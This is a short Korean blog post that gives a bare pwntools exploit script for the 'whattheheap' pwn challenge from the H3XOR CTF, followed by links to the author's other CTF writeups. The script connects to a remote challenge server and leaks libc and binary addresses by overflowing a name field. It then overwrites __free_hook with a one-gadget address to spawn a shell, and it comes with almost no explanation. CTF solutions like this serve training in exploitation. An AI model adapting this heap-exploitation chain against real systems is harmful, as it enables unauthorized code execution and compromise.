y0u_bat
[H3XOR] whattheheap 본문
[H3XOR] whattheheap
심심해서 풀어봤습니당.
whattheheapExploit
from pwn import *
context.log_level = 'debug'
#s = process("./whattheheap")
s = remote("49.236.136.140",16000)
def leak():
s.recvuntil("please input your name!\n")
s.send("a"*0x28)
s.sendline("6")
s.recvuntil("a"*0x28)
libc_base = u64(s.recv(6) + "\x00\x00") - 0x18c627
s.sendline("5")
s.recvuntil("Enter the name you want to change.\n")
s.send("b"*0xd8)
s.sendline("6")
s.recvuntil("b"*0xd8)
func_base = u64(s.recv(6)+"\x00\x00")- 0x108d
return libc_base,func_base
libc_base,func_base = leak()
free_hook = libc_base + 0x3C67A8
s.sendline("5")
s.recvuntil("Enter the name you want to change.\n")
s.send(p64(free_hook))
s.recvuntil(">")
s.sendline("3")
s.recvuntil(">")
s.sendline("1")
s.send(p64(libc_base+0x4526a))
s.recvuntil(">")
s.sendline("2")
s.recvuntil(">")
s.sendline("0")
log.info("libc_base : " + hex(libc_base))
log.info("func_base : " + hex(func_base))
s.interactive()
'System > [CTF]' 카테고리의 다른 글
| [XCTF] - once writeup (0) | 2018.04.12 |
|---|---|
| Codegate2018 - BaskinRobins31 (0) | 2018.02.10 |
| Codegate2018 - Super Marimo (0) | 2018.02.10 |
| Codegaet2018 - Melong (0) | 2018.02.10 |
| [DEFCON 2017] mute (0) | 2017.05.08 |
Comments